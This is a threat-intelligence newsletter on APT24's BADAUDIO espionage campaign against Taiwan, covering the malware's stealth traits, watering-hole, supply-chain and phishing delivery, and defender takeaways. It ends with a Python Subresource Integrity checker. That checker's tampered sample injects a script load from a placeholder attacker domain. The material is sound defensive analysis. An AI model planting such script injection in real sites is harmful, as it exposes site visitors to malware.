April 11, 2026 Newsletter
At the center of this operation is a previously undocumented first-stage malware dubbed BADAUDIO, used to gain and maintain persistent remote access to victim environments over nearly three years, with a heavy focus on organizations in Taiwan.
Who APT24 Is Targeting and Why It Matters
APT24, also known as Pitty Tiger, is a China-nexus hacking group that has been active since at least 2008. Historically, it has targeted government, healthcare, construction and engineering, mining, telecom, and non-profit sectors in Taiwan and the U.S., with a clear focus on intellectual property theft and strategically valuable data.
The BADAUDIO campaign continues that pattern, but with a more sophisticated operational playbook:
Focus on organizations in Taiwan, including those connected through shared third-party services
Long-term operations designed to stay hidden rather than cause splashy disruption
Use of multiple initial access vectors over time instead of a single attack method
What BADAUDIO Actually Does
BADAUDIO is not a noisy, all-in-one backdoor. It is a highly obfuscated, C++ first-stage downloader engineered for stealth, persistence, and flexibility.
Key traits:
Obfuscation via control flow flattening
The code structure is intentionally scrambled, making it difficult for analysts and automated tools to understand the execution path.
First-stage downloader behavior
Collects basic system details (hostname, user, architecture).
Sends that data to a hard-coded command-and-control (C2) server, often embedded in a cookie.
Downloads, decrypts (AES), and executes the next-stage payload directly in memory.
Integration with other tooling
In at least one case, the second stage was a Cobalt Strike Beacon tied to an earlier APT24 operation via a unique watermark.
Execution via DLL hijacking
Typically deployed as a malicious DLL using DLL Search Order Hijacking (MITRE ATT&CK T1574.001), piggybacking on legitimate applications for execution.
Recent variants arrive inside encrypted archives that contain the BADAUDIO DLL plus helper VBS, BAT, and LNK files.
The result: defenders looking only for obvious implants or noisy persistence mechanisms will miss this first-stage loader, even as it quietly sets up follow-on access and tooling.
How Initial Access Evolved: From Watering Holes to Supply Chain to Phishing
Google’s analysis shows that APT24 did not stick to one delivery route. Instead, they iterated through a series of increasingly targeted and scalable tactics from November 2022 through at least September 2025.
Phase 1: Strategic Web Compromises (Watering Holes)
From late 2022 onward, APT24 compromised 20+ legitimate websites, injecting malicious JavaScript:
The script excluded macOS, iOS, and Android, focusing only on Windows visitors.
It used FingerprintJS to generate unique browser fingerprints and send them to attacker infrastructure.
Only selected visitors were then presented with a fake Google Chrome update pop-up prompting a BADAUDIO download.
This gave the operators both reach (through popular sites) and precision (targeting only interesting visitors).
Phase 2: Supply Chain Attack via a Marketing Firm
In July 2024, APT24 escalated to a supply chain compromise by breaching a regional digital marketing firm in Taiwan:
The attackers injected malicious JavaScript into a widely used third-party JS library distributed by the firm.
That library was embedded across more than 1,000 domains, turning a single supplier compromise into broad downstream exposure.
The malicious script contacted a typosquatted CDN domain, fetched attacker-controlled JavaScript, fingerprinted the browser, and then served the same fake-update BADAUDIO payload.
Initially, the malicious logic only targeted specific domains using conditional script loading. For about ten days in August 2025, those restrictions were temporarily lifted, meaning all 1,000+ domains using the script were at risk before the targeting filter was re-enabled.
Phase 3: Targeted Phishing With Cloud-Hosted Archives
From August 2024 onward, APT24 added spear-phishing to the mix:
Lures referenced an animal rescue organization, a benign and emotionally engaging theme designed to lower suspicion.
Emails contained links to encrypted archives hosted on Google Drive and Microsoft OneDrive.
Once extracted and executed, these archives deployed BADAUDIO via the DLL hijacking chain.
Phishing messages were equipped with tracking pixels to confirm open rates and refine targeting.
The pattern is clear: strategic web compromises for reach, supply chain compromises for scale and trust, and spear-phishing for precision—all delivering the same core malware family.
Part of a Larger Pattern of China-Nexus Espionage
The BADAUDIO campaign is not an isolated event. The article ties it to a broader set of operations attributed to suspected China-linked actors, including a separate campaign dubbed “Autumn Dragon” targeting government and media entities across Laos, Cambodia, Singapore, the Philippines, and Indonesia.
That operation:
Used spear-phishing with RAR archives exploiting a WinRAR vulnerability (CVE-2025-8088).
Employed DLL side-loading using legitimate executables (e.g., obs-browser-page.exe with a malicious libcef.dll).
Leveraged Telegram for C2 and further staged a lightweight C++ implant via additional side-loading.
Hid later-stage infrastructure behind Cloudflare with geo restrictions and user agent checks to limit visibility.
The overlap is in tradecraft: DLL side-loading, living off legitimate services, layered staging, and tight geo-scoping.
Strategic Takeaways for Defenders
The BADAUDIO story is less about a single malware family and more about how modern state-backed actors operate over years:
Multi-vector access is the norm. Expect campaigns to use watering holes, supply chain injections, and targeted phishing in parallel.
Third-party JavaScript and CDNs are now high-value targets. A single marketing or analytics script can quietly compromise hundreds or thousands of domains.
First-stage loaders are engineered for invisibility. Obfuscation, in-memory execution, and DLL hijacking ensure that by the time conventional controls notice anything, the operation is already well established.
Legitimate cloud services are part of the attack surface. Google Drive, OneDrive, and other trusted platforms are central to both delivery and command-and-control, complicating simple “block by domain” strategies.
This campaign underlines a simple reality: long-term, state-backed espionage no longer hinges on a single vulnerability or obvious piece of malware. It rides on a combination of trusted relationships, third-party code, cloud services, and stealthy loaders that quietly reshape the risk surface for any organization connected to those supply chains.
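A defender-side check for the Phase 2 supply-chain scenario and for the takeaway on third-party JavaScript above: Subresource Integrity (SRI) pins the hash of an embedded library at deploy time, so a copy altered at the supplier fails the browser's check instead of loading. This is an added example, not code from the report or from Google; the library contents, the placeholder CDN domain and the HTML snippet are constructed for illustration.

```python
import base64
import hashlib
import re
from typing import List

# Constructed sample: the "known-good" third-party library a site embeds.
GOOD_LIB = "window.analyticsInit = function () { /* legitimate library body */ };\n"

# Constructed sample: the same file after a supply-chain modification that
# pulls a further script from a placeholder (not real) attacker-controlled domain.
TAMPERED_LIB = GOOD_LIB + (
    "document.head.appendChild(Object.assign(document.createElement('script'),"
    " {src: 'https://cdn-placeholder.invalid/x.js'}));\n"
)

def sri_digest(body: str, algo: str = "sha384") -> str:
    """Return the SRI integrity value ("sha384-<base64>") for a script body."""
    raw = hashlib.new(algo, body.encode("utf-8")).digest()
    return f"{algo}-{base64.b64encode(raw).decode('ascii')}"

def sri_matches(body: str, expected: str) -> bool:
    """True if a fetched body still matches the integrity value pinned at deploy time."""
    algo, _, _ = expected.partition("-")
    return sri_digest(body, algo) == expected

def script_tag(src: str, body: str) -> str:
    """Build the <script> tag a site should publish for a pinned third-party library."""
    return f'<script src="{src}" integrity="{sri_digest(body)}" crossorigin="anonymous"></script>'

_SCRIPT_RE = re.compile(r"<script\b([^>]*)>", re.IGNORECASE)

def unpinned_external_scripts(html: str) -> List[str]:
    """List external script URLs in a page that carry no integrity attribute.

    Useful when auditing a site for third-party scripts that a supplier
    compromise could silently alter (inline scripts are ignored)."""
    found = []
    for attrs in _SCRIPT_RE.findall(html):
        src = re.search(r'\bsrc\s*=\s*["\']([^"\']+)["\']', attrs, re.IGNORECASE)
        if src and not re.search(r"\bintegrity\s*=", attrs, re.IGNORECASE):
            found.append(src.group(1))
    return found

if __name__ == "__main__":
    pinned = sri_digest(GOOD_LIB)
    print(script_tag("https://cdn-placeholder.invalid/lib.js", GOOD_LIB))
    print("good copy verifies:", sri_matches(GOOD_LIB, pinned))        # True
    print("tampered copy verifies:", sri_matches(TAMPERED_LIB, pinned))  # False
```

SRI only protects resources whose contents are fixed at deploy time; a library that changes often, or that loads further scripts itself, also needs a Content Security Policy and monitoring of what the site actually fetches.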